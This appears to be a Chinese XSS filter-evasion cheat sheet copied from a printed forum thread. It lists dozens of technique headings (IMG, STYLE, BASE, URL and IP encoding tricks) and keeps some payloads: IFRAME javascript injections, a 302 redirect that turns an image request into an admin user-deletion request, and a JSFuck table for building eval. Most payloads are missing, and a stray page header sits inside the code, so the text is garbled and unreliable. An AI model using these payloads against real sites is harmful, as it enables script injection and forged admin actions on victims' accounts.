# Cross-Site Scripting ## 1、常见XSS ``` ·普通的XSS JavaScript注入： ·IMG标签XSS使用JavaScript命令： ·IMG标签无分号无引号：

·IMG标签大小写不敏感：

·HTML编码（必须有分号）：

·修正缺陷IMG标签： "> ·formCharCode标签（计算器）：

·十六进制编码：

·嵌入式标签，将JavaScript分开：

·嵌入式编码标签，将JavaScript分开：

·嵌入式换行符：

·嵌入式回车：

·嵌入式多行注入JavaScript，这是XSS极端的例子：

·解决限制字符（要求同页面）： ·Spaces和meta前的IMG标签：

·Non-alpha-non-digit XSS： ·Non-alpha-non-digit XSS to 2： ·Non-alpha-non-digit XSS to 3： ·双开括号： < ·无结束脚本标记（仅火狐等浏览器）： ·Input Image： ·BODY Image： ·BODY标签： ·IMG Dynsrc： ·IMG Lowsrc： ·BGSOUND： ·STYLE sheet： ·远程样式表： ·List-style-image（列表式）：

XSS ·IMG VBscript：

XSS ·META链接url： ·Iframe： ·Frame： 12-7-1 T00LS - Powered by Discuz! Board https://www.t00ls.net/viewthread.php?action=printable&tid=15267 3/6 ·Table： ·TD：

·DIV background-image：

·DIV expression：

·STYLE属性分拆表达： ·匿名STYLE（组成：开角号和一个字母开头）： ·STYLE background-image： ·STYLE background： ·使用BASE标签： ·IMG嵌入式命令，可执行任意命令：

·IMG嵌入式命令（a.jpg在同服务器）： Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser ·绕符号过滤： ·URL绕行： XSS ·URL编码： XSS ·IP十进制： XSS ·IP八进制： XSS ·节省[http:]： XSS ·节省[www]： XSS ·JavaScript链接： XSS 常见XSS攻击载荷：

">

">123

">

</ IFRAME>123</h1><IFRAME SRC="javascript:alert('XSS');">">

</ IFRAME>123</h1> ``` ## 2、特殊XSS ### 1.Jsfuck  Jsfuck可以针对常见的js函数、语法进行编码转换：  ``` False => ![] True => !![ ]Undefined => [][[]] Nan => +[![]] 0 => +[] 1 => +!+[] 2 => !+[]+!+[] 10 => [+!+[]]+[+[]] Array => [] Number => +[] String => []+[] Boolean => ![] Function => []["filter"] Eval => []["filter"]["constructor"]( code )() Window => []["filter"]["constructor"]("return this")() ``` ### 2.Aaencode  js加密工具aaencode把js转为文字表情符号。